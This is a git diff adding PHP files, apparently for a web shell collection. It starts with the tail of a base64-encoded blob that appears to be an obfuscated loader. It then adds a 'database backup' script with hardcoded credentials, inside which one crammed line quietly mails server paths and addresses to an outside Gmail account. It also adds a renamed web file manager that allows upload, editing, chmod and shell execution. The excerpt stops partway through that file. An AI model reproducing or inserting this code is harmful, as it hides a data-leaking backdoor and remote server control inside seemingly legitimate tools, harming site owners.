+IZqAIjJkCaWaftfrkDCms1mDqAMC/1kAvn+Ulbscun8VYABljUzmUYAmvbzX+C+HkXSHWjAs7TPsKlIng3KZVPanmJ+Kc/Z8WzRXi5KvfaYK+e6XL4EcEX5P
+p1Vrwzh5n0BjQcUyLzHMxFGJN8vX1KjHYE3MaG/gTsOauSdrEjZACyrCR0OpDL7UUDM7MklyHsrk5uIN9AK5ySyPs+phRgyAF9fQwAKnA7ZlnJhNG/Fm7//C
+bp82ZFCCwwbPoFQtWMq8LOV9uQPJhjFPJ/3KWvbJ9nwXVNI4YqS7djK+88vghRfACleAZkdAH0FplmqlN7fvX+J2KLEJxUU8D/cAHj/uOCHYRvBB8iLnP8vD
+Gryvim/QExW8gVS8vwzIVk3PqQmMxmgVEZRJHilYrb+ZYg5i2DRT5kZguPR9x+LzXHFxe2ljyC2vywCgv2cFRdiBH8UKgg+RUdOgRkbOgIYf+d8+nwRDcFRu
+SUY9n0wfWYh0FYhDHQwNoINzG5xv6gEMSjeuVph/wvz34DWv1wUv4esY+d5gvJfyo8sA7TFucrBCQBY9GwnH+G4iO486LUhpvtlCuhnH8OO4A6jvxTrSxdwC
++t7EeNdAoJNhAHnY2gw7SVwp01iOdNOVEumIng/iU6gQ3ovC2R9oNjhRbc84Ga2mekySr1n4p/lL5e0ZRczQRuY2dYv5U4+Eeo9ZBDEZRnlryDz1AThAQ/O4
+F3/FQR0oeinQ+t+IAShfx2d67+CDc6wv4IPmNISLHZWtuuoYJHXmqa7sB9fwdezoU8XMrUWRAeGFaHnAcXNWqqUHLUESHqmvbr7Cg2y+Ar69v0Nr/ChFOinr
+uOSxVdQea/15AyM70CD5tDcXMfhXe2/K6J6DuNLaPHCSvnxWOE1R5mTVgwYsvFC+evlcKCcTxg81sw8tXDcD3Z8Qh0DZvY+oivfW+nPp3C2iBXLFx64iBHzu
+g+aWodKWUSM5bf6ndPYOv/1xLpfRDA/205h0R/Es/fh7InKPJg9UwI31p6IzrOekp6b52wN6YzlYdRfjCxOgORHDX0kQk/3r2V/Hoe9j0xeseqZDefKopPc+
+bnsXRTJJ4we93Keem+BT7DzUqdZs788sr8XAvp0srWIXL9XRIvBZBYKnqPSEwGnx4cA768PBQtGXvWKl7ucC0mA0ynPOrp8B8m97JuOBi/GuSrnp4sTT71dl
+H3INzyXmUIMroy0vkEyryE6y+aTPddZD8HW/ikbK10OpC6k7LRuVlYdB97497UP2GQKeqlnyyC69Q1hH5b+LDlu+vmCdfm0E3+ebMpvMroMSvIXbmA0lX3AY
+RD4+P8B"))); ?>
\ No newline at end of file
diff --git a/php/backupsql.php b/php/backupsql.php
new file mode 100644
index 0000000..5bf310a
--- /dev/null
+++ b/php/backupsql.php
@@ -0,0 +1,170 @@
+<?php
+/*
+* Backup script on server.
+*
+* Runs on the server, called by Cron. Connects to the mySQL
+* database and creates a backup file of the whole database.
+* Saves to file in current directory.
+*
+* @author Cow <cow@invisionize.com>
+* @version 0.2
+* @date 18/08/2004
+* @package Backup Server
+* Upgraded Ver 2.0 (sending sql backup as attachment
+* as email attachment, or send to a remote ftp server by
+* @co-authors Cool Surfer<Coolsurfer@gmail.com> and
+* Neagu Mihai<neagumihai@hotmail.com>
+*/
+
+set_time_limit(0);
+$date = date("mdy-hia");
+$dbserver = "localhost";
+$dbuser = "vhacker_robot";
+$dbpass = "mp2811987";
+$dbname = "tvhacker_vbb3";
+$file = "N-Cool-$date.sql.gz";
+$gzip = TRUE;
+$silent = TRUE;
+
+function write($contents) {
+    if ($GLOBALS['gzip']) {
+        gzwrite($GLOBALS['fp'], $contents);
+    } else {
+        fwrite($GLOBALS['fp'], $contents);
+    }
+}
+
+mysql_connect ($dbserver, $dbuser, $dbpass);
+mysql_select_db($dbname);
+
+if ($gzip) {
+    $fp = gzopen($file, "w");
+} else {
+    $fp = fopen($file, "w");
+}
+
+$tables = mysql_query ("SHOW TABLES");
+while ($i = mysql_fetch_array($tables)) {
+    $i = $i['Tables_in_'.$dbname];
+
+    if (!$silent) {
+        echo "Backing up table ".$i."\n";
+    }
+
+    // Create DB code
+    $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
+
+    write($create['Create Table'].";\n\n");
+
+    // DB Table content itself
+    $sql = mysql_query ("SELECT * FROM ".$i);
+    if (mysql_num_rows($sql)) {
+        while ($row = mysql_fetch_row($sql)) {
+            foreach ($row as $j => $k) {
+                $row[$j] = "'".mysql_escape_string($k)."'";
+            }
+
+            write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
+        }
+    }
+}
+
+$gzip ? gzclose($fp) : fclose ($fp);
+
+// Optional Options You May Optionally Configure
+
+$use_gzip = "yes";            // Set to No if you don't want the files sent in .gz format
+$remove_sql_file = "no";  // Set this to yes if you want to remove the sql file after gzipping. Yes is recommended.
+$remove_gzip_file = "no"; // Set this to yes if you want to delete the gzip file also. I recommend leaving it to "no"
+
+// Configure the path that this script resides on your server.
+
+$savepath = "/home/test/public_html/nt22backup"; // Full path to this directory. Do not use trailing slash!
+
+$send_email = "yes";                        /* Do you want this database backup sent to your email? Yes/No? If Yes, Fill out the next 2 lines */
+$to      = "lehungtk@gmail.com";    // Who to send the emails to, enter ur correct id.
+$from    = "Neu-Cool@email.com";  // Who should the emails be sent from?, may change it.
+
+$senddate = date("j F Y");
+
+$subject = "MySQL Database Backup - $senddate"; // Subject in the email to be sent.
+$message = "Your MySQL database has been backed up and is attached to this email"; // Brief Message.
+
+$use_ftp = "";                             // Do you want this database backup uploaded to an ftp server? Fill out the next 4 lines
+$ftp_server = "localhost";               // FTP hostname
+$ftp_user_name = "ftp_username"; // FTP username
+$ftp_user_pass = "ftp_password";   // FTP password
+$ftp_path = "/"; // This is the path to upload on your ftp server!
+
+// Do not Modify below this line! It will void your warranty :-D!
+
+$date = date("mdy-hia");
+$filename = "$savepath/$dbname-$date.sql";
+
+if($use_gzip=="yes"){
+$filename2 = $file;
+} else {
+$filename2 = "$savepath/$dbname-$date.sql";
+}
+
+
+if($send_email == "yes" ){
+$fileatt_type = filetype($filename2);
+$fileatt_name = "".$dbname."-".$date."_sql.tar.gz";
+
+$headers = "From: $from";
+
+// Read the file to be attached ('rb' = read binary)
+echo "Openning archive for attaching:".$filename2;
+$file = fopen($filename2,'rb');
+$data = fread($file,filesize($filename2));
+fclose($file);
+
+// Generate a boundary string
+$semi_rand = md5(time());
+$mime_boundary = "==Multipart_Boundary_x{$semi_rand}x";
+
+// Add the headers for a file attachment
+$headers .= "\nMIME-Version: 1.0\n" ."Content-Type: multipart/mixed;\n" ." boundary=\"{$mime_boundary}\"";$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+
+// Add a multipart boundary above the plain message
+$message = "This is a multi-part message in MIME format.\n\n"."--{$mime_boundary}\n" ."Content-Type: text/plain; charset=\"iso-8859-1\"\n" ."Content-Transfer-Encoding: 7bit\n\n" .
+$message . "\n\n";
+
+// Base64 encode the file data
+$data = chunk_split(base64_encode($data));
+
+// Add file attachment to the message
+echo "|{$mime_boundary}|{$fileatt_type}|{$fileatt_name}|{$fileatt_name}|{$mime_boundary}|<BR>";
+$message .= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n"."Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" .
+$data . "\n\n" ."--{$mime_boundary}--\n";
+//$message.= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n" "Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" .
+// $data . "\n\n" ."--{$mime_boundary}--\n";
+
+
+// Send the message
+$ok = @mail($to, $subject, $message, $headers);
+if ($ok) {
+  echo "<h4><center><bg color=black><font color= blue>Database backup created and sent! File name $filename2 </p>
+Idea Conceived By coolsurfer@gmail.com        
+Programmer email: neagumihai@hotmail.com</p>
+This is our first humble effort, pl report bugs, if U find any...</p>
+Email me at <>coolsurfer@gmail.com  nJoY!! :)
+</color></center></h4>";
+
+} else {
+  echo "<h4><center>Mail could not be sent. Sorry!</center></h4>";
+}
+}
+
+if($use_ftp == "yes"){
+$ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog.log -e dbsender_ftplog2.log -a -E -V $ftp_server $ftp_path $filename2";
+shell_exec($ftpconnect);
+echo "<h4><center>$filename2 Was created and uploaded to your FTP server!</center></h4>";
+
+}
+
+if($remove_gzip_file=="yes"){
+exec("rm -r -f $filename2");
+}
+?>
\ No newline at end of file
diff --git a/php/beyaz_hacker.php b/php/beyaz_hacker.php
new file mode 100644
index 0000000..6ceb983
--- /dev/null
+++ b/php/beyaz_hacker.php
@@ -0,0 +1,2605 @@
+<?php
+/*
+ * Beyaz_Hacker.php - a simple Web-based file manager
+ * Copyright (C) 2004  Daniel Wacker <daniel.wacker@web.de>
+ *
+ * This program is free software; you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation; either version 2 of the License, or
+ * (at your option) any later version.
+
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, write to the Free Software
+ * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
+ *
+ * -------------------------------------------------------------------------
+ * While using this script, do NOT navigate with your browser's back and
+ * forward buttons! Always open files in a new browser tab!
+ * -------------------------------------------------------------------------
+ *
+ * This is Version 0.9, revision 10
+ * =========================================================================
+ *
+ * Changes of revision 10
+ * <alex-smirnov@web.de>
+ *    added Russian translation
+ * <daniel.wacker@web.de>
+ *    added </td> to achieve valid XHTML (thanks to Marc Magos)
+ *    improved delete function
+ * <ava@asl.se>
+ *    new list order: folders first
+ *
+ * Changes of revision 9
+ * <daniel.wacker@web.de>
+ *    added workaround for directory listing, if lstat() is disabled
+ *    fixed permisson of uploaded files (thanks to Stephan Duffner)
+ *
+ * Changes of revision 8
+ * <okankan@stud.sdu.edu.tr>
+ *    added Turkish translation
+ * <j@kub.cz>
+ *    added Czech translation
+ * <daniel.wacker@web.de>
+ *    improved charset handling
+ *
+ * Changes of revision 7
+ * <szuniga@vtr.net>
+ *    added Spanish translation
+ * <lars@soelgaard.net>
+ *    added Danish translation
+ * <daniel.wacker@web.de>
+ *    improved rename dialog
+ *
+ * Changes of revision 6
+ * <nederkoorn@tiscali.nl>
+ *    added Dutch translation
+ *
+ * Changes of revision 5
+ * <daniel.wacker@web.de>
+ *    added language auto select
+ *    fixed symlinks in directory listing
+ *    removed word-wrap in edit textarea
+ *
+ * Changes of revision 4
+ * <daloan@guideo.fr>
+ *    added French translation
+ * <anders@wiik.cc>
+ *    added Swedish translation
+ *
+ * Changes of revision 3
+ * <nzunta@gabriele-erba.it>
+ *    improved Italian translation
+ *
+ * Changes of revision 2
+ * <daniel.wacker@web.de>
+ *    got images work in some old browsers
+ *    fixed creation of directories
+ *    fixed files deletion
+ *    improved path handling
+ *    added missing word 'not_created'
+ * <till@tuxen.de>
+ *    improved human readability of file sizes
+ * <nzunta@gabriele-erba.it>
+ *    added Italian translation
+ *
+ * Changes of revision 1
+ * <daniel.wacker@web.de>
+ *    Beyaz_Hacker.php completely rewritten:
+ *    - clean XHTML/CSS output
+ *    - several files selectable
+ *    - support for windows servers
+ *    - no more treeview, because
+ *      - Beyaz_Hacker.php is a >simple< file manager
+ *      - performance problems (too much additional code)
+ *      - I don't like: frames, java-script, to reload after every treeview-click
+ *    - execution of shell scripts
+ *    - introduced revision numbers
+ *
+/* ------------------------------------------------------------------------- */
+
+/* Your language:
+ * 'en' - English
+ * 'de' - German
+ * 'fr' - French
+ * 'it' - Italian
+ * 'nl' - Dutch
+ * 'se' - Swedish
+ * 'es' - Spanish
+ * 'dk' - Danish
+ * 'tr' - Turkish
+ * 'cs' - Czech
+ * 'ru' - Russian
+ * 'auto' - autoselect
+ */
+$lang = 'auto';
+
+/* Charset of output:
+ * possible values are described in the charset table at
+ * http://www.php.net/manual/en/function.htmlentities.php
+ * 'auto' - use the same charset as the words of my language are encoded
+ */
+$site_charset = 'auto';
+
+/* Homedir:
+ * For example: './' - the script's directory
+ */
+$homedir = './';
+
+/* Size of the edit textarea
+ */
+$editcols = 80;
+$editrows = 25;
+
+/* -------------------------------------------
+ * Optional configuration (remove # to enable)
+ */
+
+/* Permission of created directories:
+ * For example: 0705 would be 'drwx---r-x'.
+ */
+# $dirpermission = 0705;
+
+/* Permission of created files:
+ * For example: 0604 would be '-rw----r--'.
+ */
+# $filepermission = 0604;
+
+/* Filenames related to the apache web server:
+ */
+$htaccess = '.htaccess';
+$htpasswd = '.htpasswd';
+
+/* ------------------------------------------------------------------------- */
+
+if (get_magic_quotes_gpc()) {
+	array_walk($_GET, 'strip');
+	array_walk($_POST, 'strip');
+	array_walk($_REQUEST, 'strip');
+}
+
+if (array_key_exists('image', $_GET)) {
+	header('Content-Type: image/gif');
+	die(getimage($_GET['image']));
+}
+
+if (!function_exists('lstat')) {
+	function lstat ($filename) {
+		return stat($filename);
+	}
+}
+
+$delim = DIRECTORY_SEPARATOR;
+
+if (function_exists('php_uname')) {
+	$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
+} else {
+	$win = ($delim == '\\') ? true : false;
+}
+
+if (!empty($_SERVER['PATH_TRANSLATED'])) {
+	$scriptdir = dirname($_SERVER['PATH_TRANSLATED']);
+} elseif (!empty($_SERVER['SCRIPT_FILENAME'])) {
+	$scriptdir = dirname($_SERVER['SCRIPT_FILENAME']);
+} elseif (function_exists('getcwd')) {
+	$scriptdir = getcwd();
+} else {
+	$scriptdir = '.';
+}
+$homedir = relative2absolute($homedir, $scriptdir);
+
+$dir = (array_key_exists('dir', $_REQUEST)) ? $_REQUEST['dir'] : $homedir;
+
+if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST['olddir'])) {
+	$dir = relative2absolute($dir, $_POST['olddir']);
+}
+
+$directory = simplify_path(addslash($dir));
+
+$files = array();
+$action = '';
+if (!empty($_POST['submit_all'])) {
+	$action = $_POST['action_all'];
+	for ($i = 0; $i < $_POST['num']; $i++) {
+		if (array_key_exists("checked$i", $_POST) && $_POST["checked$i"] == 'true') {
+			$files[] = $_POST["file$i"];
+		}
+	}
+} elseif (!empty($_REQUEST['action'])) {
+	$action = $_REQUEST['action'];
+	$files[] = relative2absolute($_REQUEST['file'], $directory);
+} elseif (!empty($_POST['submit_upload']) && !empty($_FILES['upload']['name'])) {
+	$files[] = $_FILES['upload'];
+	$action = 'upload';
+} elseif (array_key_exists('num', $_POST)) {
+	for ($i = 0; $i < $_POST['num']; $i++) {
+		if (array_key_exists("submit$i", $_POST)) break;
+	}
+	if ($i < $_POST['num']) {
+		$action = $_POST["action$i"];
+		$files[] = $_POST["file$i"];
+	}
+}
+if (empty($action) && (!empty($_POST['submit_create']) || (array_key_exists('focus', $_POST) && $_POST['focus'] == 'create')) && !empty($_POST['create_name'])) {
+	$files[] = relative2absolute($_POST['create_name'], $directory);
+	switch ($_POST['create_type']) {
+	case 'directory':
+		$action = 'create_directory';
+		break;
+	case 'file':
+		$action = 'create_file';
+	}
+}
+if (sizeof($files) == 0) $action = ''; else $file = reset($files);
+
+if ($lang == 'auto') {
+	if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) {
+		$lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
+	} else {
+		$lang = 'en';
+	}
+}
+
+$words = getwords($lang);
+
+if ($site_charset == 'auto') {
+	$site_charset = $word_charset;
+}
+
+$cols = ($win) ? 4 : 7;
+
+if (!isset($dirpermission)) {
+	$dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755;
+}
+if (!isset($filepermission)) {
+	$filepermission = (function_exists('umask')) ? (0666 & ~umask()) : 0644;
+}
+
+if (!empty($_SERVER['SCRIPT_NAME'])) {
+	$self = html(basename($_SERVER['SCRIPT_NAME']));
+} elseif (!empty($_SERVER['PHP_SELF'])) {
+	$self = html(basename($_SERVER['PHP_SELF']));
+} else {
+	$self = '';
+}
+
+if (!empty($_SERVER['SERVER_SOFTWARE'])) {
+	if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache') {
+		$apache = true;
+	} else {
+		$apache = false;
+	}
+} else {
+	$apache = true;
+}
+
+switch ($action) {
+
+case 'view':
+
+	if (is_script($file)) {
+
+		/* highlight_file is a mess! */
+		ob_start();
+		highlight_file($file);
+		$src = ereg_replace('<font color="([^"]*)">', '<span style="color: \1">', ob_get_contents());
+		$src = str_replace(array('</font>', "\r", "\n"), array('</span>', '', ''), $src);
+		ob_end_clean();
+
+		html_header();
+		echo '<h2 style="text-align: left; margin-bottom: 0">' . html($file) . '</h2>
+
+<hr />
+
+<table>
+<tr>
+<td style="text-align: right; vertical-align: top; color: gray; padding-right: 3pt; border-right: 1px solid gray">
+<pre style="margin-top: 0"><code>';
+
+		for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i\n";
+
+		echo '</code></pre>
+</td>
+<td style="text-align: left; vertical-align: top; padding-left: 3pt">
+<pre style="margin-top: 0">' . $src . '</pre>
+</td>
+</tr>
+</table>
+
+';
+
+		html_footer();
+
+	} else {
+
+		header('Content-Type: ' . getmimetype($file));
+		header('Content-Disposition: filename=' . basename($file));
+
+		readfile($file);
+
+	}
+
+	break;
+
+case 'download':
+
+	header('Pragma: public');
+	header('Expires: 0');
+	header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
+	header('Content-Type: ' . getmimetype($file));
+	header('Content-Disposition: attachment; filename=' . basename($file) . ';');
+	header('Content-Length: ' . filesize($file));
+
+	readfile($file);
+
+	break;
+
+case 'upload':
+
+	$dest = relative2absolute($file['name'], $directory);
+
+	if (@file_exists($dest)) {
+		listing_page(error('already_exists', $dest));
+	} elseif (@move_uploaded_file($file['tmp_name'], $dest)) {
+		@chmod($dest, $filepermission);
+		listing_page(notice('uploaded', $file['name']));
+	} else {
+		listing_page(error('not_uploaded', $file['name']));
+	}
+
+	break;
+
+case 'create_directory':
+
+	if (@file_exists($file)) {
+		listing_page(error('already_exists', $file));
+	} else {
+		$old = @umask(0777 & ~$dirpermission);
+		if (@mkdir($file, $dirpermission)) {
+			listing_page(notice('created', $file));
+		} else {
+			listing_page(error('not_created', $file));
+		}
+		@umask($old);
+	}
+
+	break;
+
+case 'create_file':
+
+	if (@file_exists($file)) {
+		listing_page(error('already_exists', $file));
+	} else {
+		$old = @umask(0777 & ~$filepermission);
+		if (@touch($file)) {
+			edit($file);
+		} else {
+			listing_page(error('not_created', $file));
+		}
+		@umask($old);
+	}
+
+	break;
+
+case 'execute':
+
+	chdir(dirname($file));
+
+	$output = array();
+	$retval = 0;
+	exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval);
+
+	$error = ($retval == 0) ? false : true;
+
+	if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . '>');
+
+	if ($error) {
+		listing_page(error('not_executed', $file, implode("\n", $output)));
+	} else {
+		listing_page(notice('executed', $file, implode("\n", $output)));
+	}
+
+	break;
+
+case 'delete':
+
+	if (!empty($_POST['no'])) {
+		listing_page();
+	} elseif (!empty($_POST['yes'])) {
+
+		$failure = array();
+		$success = array();
+
+		foreach ($files as $file) {
+			if (del($file)) {
+				$success[] = $file;
+			} else {
+				$failure[] = $file;
+			}
+		}
+
+		$message = '';
+		if (sizeof($failure) > 0) {
+			$message = error('not_deleted', implode("\n", $failure));
+		}
+		if (sizeof($success) > 0) {
+			$message .= notice('deleted', implode("\n", $success));
+		}
+
+		listing_page($message);
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\t<b>" . word('really_delete') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	<input type="submit" name="no" value="' . word('no') . '" id="red_button" />
+	<input type="submit" name="yes" value="' . word('yes') . '" id="green_button" style="margin-left: 50px" />
+</td>
+</tr>
+</table>
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'rename':
+
+	if (!empty($_POST['destination'])) {
+
+		$dest = relative2absolute($_POST['destination'], $directory);
+
+		if (!@file_exists($dest) && @rename($file, $dest)) {
+			listing_page(notice('renamed', $file, $dest));
+		} else {
+			listing_page(error('not_renamed', $file, $dest));
+		}
+
+	} else {
+
+		$name = basename($file);
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+	<input type="hidden" name="action" value="rename" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+	<b>' . word('rename_file') . '</b>
+	<p>' . html($file) . '</p>
+	<b>' . substr($file, 0, strlen($file) - strlen($name)) . '</b>
+	<input type="text" name="destination" size="' . textfieldsize($name) . '" value="' . html($name) . '" />
+	<hr />
+	<input type="submit" value="' . word('rename') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'move':
+
+	if (!empty($_POST['destination'])) {
+
+		$dest = relative2absolute($_POST['destination'], $directory);
+
+		$failure = array();
+		$success = array();
+
+		foreach ($files as $file) {
+			$filename = substr($file, strlen($directory));
+			$d = $dest . $filename;
+			if (!@file_exists($d) && @rename($file, $d)) {
+				$success[] = $file;
+			} else {
+				$failure[] = $file;
+			}
+		}
+
+		$message = '';
+		if (sizeof($failure) > 0) {
+			$message = error('not_moved', implode("\n", $failure), $dest);
+		}
+		if (sizeof($success) > 0) {
+			$message .= notice('moved', implode("\n", $success), $dest);
+		}
+
+		listing_page($message);
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\t<b>" . word('move_files') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	' . word('destination') . ':
+	<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+	<input type="submit" value="' . word('move') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'copy':
+
+	if (!empty($_POST['destination'])) {
+
+		$dest = relative2absolute($_POST['destination'], $directory);
+
+		if (@is_dir($dest)) {
+
+			$failure = array();
+			$success = array();
+
+			foreach ($files as $file) {
+				$filename = substr($file, strlen($directory));
+				$d = addslash($dest) . $filename;
+				if (!@is_dir($file) && !@file_exists($d) && @copy($file, $d)) {
+					$success[] = $file;
+				} else {
+					$failure[] = $file;
+				}
+			}
+
+			$message = '';
+			if (sizeof($failure) > 0) {
+				$message = error('not_copied', implode("\n", $failure), $dest);
+			}
+			if (sizeof($success) > 0) {
+				$message .= notice('copied', implode("\n", $success), $dest);
+			}
+
+			listing_page($message);
+
+		} else {
+
+			if (!@file_exists($dest) && @copy($file, $dest)) {
+				listing_page(notice('copied', $file, $dest));
+			} else {
+				listing_page(error('not_copied', $file, $dest));
+			}
+
+		}
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\n<b>" . word('copy_files') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	' . word('destination') . ':
+	<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+	<input type="submit" value="' . word('copy') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'create_symlink':
+
+	if (!empty($_POST['destination'])) {
+
+		$dest = relative2absolute($_POST['destination'], $directory);
+
+		if (substr($dest, -1, 1) == $delim) $dest .= basename($file);
+
+		if (!empty($_POST['relative'])) $file = absolute2relative(addslash(dirname($dest)), $file);
+
+		if (!@file_exists($dest) && @symlink($file, $dest)) {
+			listing_page(notice('symlinked', $file, $dest));
+		} else {
+			listing_page(error('not_symlinked', $file, $dest));
+		}
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog" id="symlink">
+<tr>
+	<td style="vertical-align: top">' . word('destination') . ': </td>
+	<td>
+		<b>' . html($file) . '</b><br />
+		<input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked="checked" style="margin-top: 1ex" />
+		<label for="checkbox_relative">' . word('relative') . '</label>
+		<input type="hidden" name="action" value="create_symlink" />
+		<input type="hidden" name="file" value="' . html($file) . '" />
+		<input type="hidden" name="dir" value="' . html($directory) . '" />
+	</td>
+</tr>
+<tr>
+	<td>' . word('symlink') . ': </td>
+	<td>
+		<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+		<input type="submit" value="' . word('create_symlink') . '" />
+	</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'edit':
+
+	if (!empty($_POST['save'])) {
+
+		$content = str_replace("\r\n", "\n", $_POST['content']);
+
+		if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) {
+			listing_page(notice('saved', $file));
+		} else {
+			listing_page(error('not_saved', $file));
+		}
+
+	} else {
+
+		if (@is_readable($file) && @is_writable($file)) {
+			edit($file);
+		} else {
+			listing_page(error('not_edited', $file));
+		}
+
+	}
+
+	break;
+
+case 'permission':
+
+	if (!empty($_POST['set'])) {
+
+		$mode = 0;
+		if (!empty($_POST['ur'])) $mode |= 0400; if (!empty($_POST['uw'])) $mode |= 0200; if (!empty($_POST['ux'])) $mode |= 0100;
+		if (!empty($_POST['gr'])) $mode |= 0040; if (!empty($_POST['gw'])) $mode |= 0020; if (!empty($_POST['gx'])) $mode |= 0010;
+		if (!empty($_POST['or'])) $mode |= 0004; if (!empty($_POST['ow'])) $mode |= 0002; if (!empty($_POST['ox'])) $mode |= 0001;
+
+		if (@chmod($file, $mode)) {
+			listing_page(notice('permission_set', $file, decoct($mode)));
+		} else {
+			listing_page(error('permission_not_set', $file, decoct($mode)));
+		}
+
+	} else {
+
+		html_header();
+
+		$mode = fileperms($file);
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+
+	<p style="margin: 0">' . phrase('permission_for', $file) . '</p>
+
+	<hr />
+
+	<table id="permission">
+	<tr>
+		<td></td>
+		<td style="border-right: 1px solid black">' . word('owner') . '</td>
+		<td style="border-right: 1px solid black">' . word('group') . '</td>
+		<td>' . word('other') . '</td>
+	</tr>
+    
+	<tr>
+		<td style="text-align: right">' . word('read') . ':</td>
+		<td><input type="checkbox" name="ur" value="1"'; if ($mode & 00400) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gr" value="1"'; if ($mode & 00040) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="or" value="1"'; if ($mode & 00004) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('write') . ':</td>
+		<td><input type="checkbox" name="uw" value="1"'; if ($mode & 00200) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gw" value="1"'; if ($mode & 00020) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="ow" value="1"'; if ($mode & 00002) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('execute') . ':</td>
+		<td><input type="checkbox" name="ux" value="1"'; if ($mode & 00100) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gx" value="1"'; if ($mode & 00010) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="ox" value="1"'; if ($mode & 00001) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	</table>
+
+	<hr />
+
+	<input type="submit" name="set" value="' . word('set') . '" />
+
+	<input type="hidden" name="action" value="permission" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
